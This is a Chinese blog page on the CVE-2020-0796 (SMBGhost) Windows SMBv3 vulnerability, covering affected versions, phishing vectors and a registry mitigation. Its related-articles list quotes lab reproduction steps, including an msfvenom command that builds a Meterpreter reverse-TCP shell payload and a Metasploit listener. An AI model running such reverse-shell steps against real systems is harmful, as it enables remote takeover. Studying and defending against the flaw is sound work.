cve-2020-0796_CVE20200796远程内核代码执行漏洞

最新推荐文章于 2023-12-13 21:49:54 发布
最新推荐文章于 2023-12-13 21:49:54 发布
阅读量113 收藏
点赞数
文章标签: cve-2020-0796

174ab1f9195a3e31977dc947f6d58020.gif

b4c60a389f6edd2d35ebb11fc6cf64a5.png


浅谈CVE-2020-0796远程内核代码执行漏洞
漏洞简介:

最新的Windows 10中,在处理SMB 3.1.1协议的压缩消息时,对头部数据没有做任何安全检查,直接使用,从而引发内存破坏漏洞。黑客无须任何权限,即可利用该漏洞实现远程内核代码执行。受黑客攻击的目标系统只需开机在线,即有可能被入侵。

腾讯安全团队研究发现,除了直接攻击SMB服务端造成任意代码执行外,该漏洞还存在于SMB客户端,这使得攻击者可以构造恶意的SMB服务器,并通过网页、压缩包、共享目录、OFFICE文档等多种方式传递给目标用户,触发漏洞进行攻击,即使目标机器已经禁用SMB压缩功能,甚至关闭了445端口,仍然会受到威胁,仍然会触发漏洞。


时间线:


2020-03-11 某厂家发布规则更新,疑似SMBv3严重漏洞  
2020-03-11 360-CERT 跟进并发布改漏洞初步跟进说明  
2020-03-12 微软正式更新CVE-2020-0796漏洞补丁  
2020-03-12 360CERT更新预警
影响范围:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, version 1909 (Server Core installation)
几乎包括win10所有版本
漏洞危害:
1.利用office文档钓鱼

018dbb5318dd5d60861fe19a06190335.png


攻击者,批量发送office文档,从而控制任意电脑,以及服务器。
2.利用浏览器钓鱼

9fa353e6df92665378f3122f3c4a99de.png

当浏览到恶意网站是,我们应该立即关掉浏览器,因为很可能是攻击者的外链。  


3.利用文件夹投递

20e1f21e79a3ffb88d89e16f72238a43.png

漏洞补丁:


参照:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
对于个人家用电脑的修复方法:

(1)打开powershell
(2)Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
(3)运行
此时我们的电脑就不会被检测出存在该漏洞,更不会被黑客利用了。

5a0e4b78b6e3ed0f5327f538d0af3a0f.png


相关事件,华盟君依旧会持续关注。

3b5289f32639fd70f4fe68dfcc3f455a.png

推荐文章++++

b2943a9cd2c4368f759ac740b949999d.png

*CVE-2020-1938,批量扫描工具

*CVE-2018-0833 简单利用

*CVE-2019-11043 简单利用

6abf2c8614390b89d9e494fc41ae1ade.png

ae61c87193d750b7c11fec774306208e.gif

weixin_39519798
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-0796漏洞复现
Jinmindong
03-29 768
CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的;在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码,该漏洞类似于永恒之蓝。漏洞危害等级:高。
SMB-2
H2SO2的专栏
05-14 1330
Samba服务工作原理Samba服务工作原理Samba服务的具体工作过程如图所示。① 首先客户端发送一个SMB negprot请求数据报,并列出它所支持的所有SMB协议版本。服务器收到请求信息后响应请求,并列出希望使用的协议版本。如果没有可使用的协议版本则返回0XFFFFH,结束通信。② 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求
永恒之黑(CVE-2020-0796漏洞验证
最新发布
EnerY3的博客
12-13 1000
CVE-2020-0796,也被称为“永恒之黑”,是一个严重的远程代码执行漏洞,影响了某些版本的Microsoft Windows操作系统。因此,此漏洞可能导致未经授权的远程访问和对受影响系统的完全控制。本文档中的信息不得用于未经授权的任何活动,包括但不限于未经授权的攻击行为。任何使用本文档中的信息进行未经授权的活动将违反法律,并可能导致法律后果。要保护你的系统不受这个漏洞的影响,你应该尽快安装适用于你系统版本的最新更新。请注意,本文档中的信息可能已过时,因为软件和系统可能已经修复了相关漏洞
CVE-2020-0796
m_de_g的博客
10-08 6596
CVE-2020-0796(永恒之黑) 一.对应出现的版本 永恒之黑的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
cve-2020-0796_漏洞分析视角下的CVE20200796漏洞
weixin_40008870的博客
11-23 610
1概述2020年3月10日是微软补丁日,安全社区注意到Microsoft发布并立即删除了有关CVE-2020-0796的信息;2020年3月11日早上,Microsoft发布了可纠正SMBv3协议如何处理特制请求的修补程序;2020年03月12日微软发布安全公告声称Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在远程执行代码漏洞。成功利用此漏洞...
Windows-SMB-Ghost-CVE-2020-0796漏洞分析1
08-03
CVE-2020-0796,即Windows SMB Ghost漏洞,是一个严重威胁Windows系统安全的远程代码执行漏洞。由于SMB协议在Windows系统中的广泛使用,该漏洞的影响面非常大。及时修复和采取防护措施对于防止恶意攻击至关重要。...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
由于其内核中的反序列化机制存在缺陷,攻击者可以利用此漏洞,向服务器发送恶意的序列化对象,触发代码执行,甚至获取服务器的shell权限,进行进一步的攻击活动。 该漏洞的根源在于JBOSS AS 6.x中的`org.jboss....
002.Pegasus内核漏洞分析与利用(CVE-2016-4655 4656)1
08-08
- 攻击者通过构造特定的二进制数据,可以触发内核内存的不当访问或越界操作,导致内核崩溃或代码执行。 - 在OS X环境下,这种漏洞利用可能相对直接;但在iOS中,由于额外的安全层(如ASLR、DEP等),利用这些漏洞...
Android代码-Androidroot源码利用CVE-2013-6282漏洞.zip
08-02
这个漏洞允许恶意攻击者通过MMS( Multimedia Messaging Service)消息发送特制的多媒体文件,从而在用户不知情的情况下执行任意代码,达到远程控制设备的目的。 Androidroot源码是针对这个漏洞开发的利用工具,...
CVE-2016-4656分析与调试1
08-03
漏洞主要涉及OSX和iOS中的OSUnserializeBinary函数,该函数用于反序列化二进制数据,但存在安全缺陷,可能导致远程代码执行。 首先,我们需要了解什么是OSUnserializeBinary。这个函数是Apple的XNU内核的一部分,...
CVE-2017-11780 windows高危漏洞
01-03
针对CVE-2017-11780的Windows SMB(SMBv1)远程代码执行漏洞, 针对CVE-2017-11771的Windows Search远程代码执行漏洞
cve-2020-0796_SMBGhost:微软SMBv3远程代码执行漏洞分析(CVE20200796
weixin_39754411的博客
11-23 696
漏洞描述3月11日,微软发布了针对115个CVE漏洞的补丁更新,其中最引人关注的是一个针对Smb服务器/客户端的一个内存破坏漏洞CVE编号为CVE-2020-0796,成功利用此漏洞的攻击者可以在目标SMB服务器或SMB客户端上执行任意代码,此漏洞属于严重危害的零接触蠕虫级远程代码执行漏洞,此漏洞也被称为SMBGhost或“Coronablue。3月12日,微软正式发布漏洞通告和相关...
cve-2020-0796_SMB远程代码执行漏洞CVE20200796)复现
weixin_39997795的博客
11-30 754
01 概述Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。SMB远程代码执行漏洞CVE-2020-0796,攻击者可以利用此漏洞远程无需用户验证通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制。这几天尝...
CVE_2020_0796重大windows SMB RCE漏洞
weixin_39811856的博客
03-13 503
描述如下: 漏洞是因为操作系统在处理SMBv3协议中的压缩数据包时存在错误处理。 成功构造数据包的攻击者可在远程无验证的条件下利用该漏洞执行任意代码。 易被感染系统: + Windows 10 Version 1903 for 32-bit Systems + Windows 10 Version 1903 for ARM64-based Systems + Windows 1...
CVE-2020-0796蓝屏POC 漏洞复现
ltt440888的博客
03-19 6379
微软SMBv3远程代码执行漏洞CVE-2020-0796) 1、漏洞描述 微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaC...
MSF漏洞验证之CVE-2020-0796
奕家
06-23 1753
永恒之蓝 2.0 来了,基于 SMBv3 的漏洞,Windows8和WindowsServer 2012 - Windows 10 最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受‘蠕虫型’攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。提权后可以做任意操作,例如加密你的文件勒索你。 一、环境准备 目标机:windows10 1903 x64 ip:192.168.65.134(关闭防火墙) 攻击机:kali ip:192.168.65.130 二、漏洞检...
CVE-2020-0796 SMBv3漏洞复现过程
BROTHERYY的博客
10-07 209
1.扫描主机是否存在漏 扫描py文件链接 2.下载可利用的POC poc地址 3.在kali里使用msfvenom生成shell,lhost是攻击机ip msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py 4.将生成的shell替换poc文件夹里的exploit.py的USER_PAYLOAD,整个全部替换 5.进入msf开启监听 use exploit/mu
CVE-2020-0796 SMBv3漏洞蓝屏复现+提权
anlalu233的博客
04-04 4270
1.漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。 微软公布了在Server Message Blo...
CVE-2020-0796 WIN10 永恒之黑漏洞复现
干铮的博客
08-14 1591
1.禁用windows update 2.关闭windows防火墙 3.主机发现 Vulnerable 代表易攻击 也可以把ip改为 10.3.139.0/24扫描网段 4.用msfvenom生成python类型的shellcode 5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的 6.MSF监听4444端口 use exploit/multi/handler set payload windows/x64...
RDP漏洞CVE-2019-0708:从补丁到实战分析与缓解策略
其次,文档重点分析了CVE-2019-0708这个漏洞,这可能是一个与RDP协议相关的远程代码执行漏洞。通过对该漏洞的剖析,读者可以理解漏洞是如何利用RDP协议的弱点来获取系统的控制权,进而可能导致未经授权的访问或恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值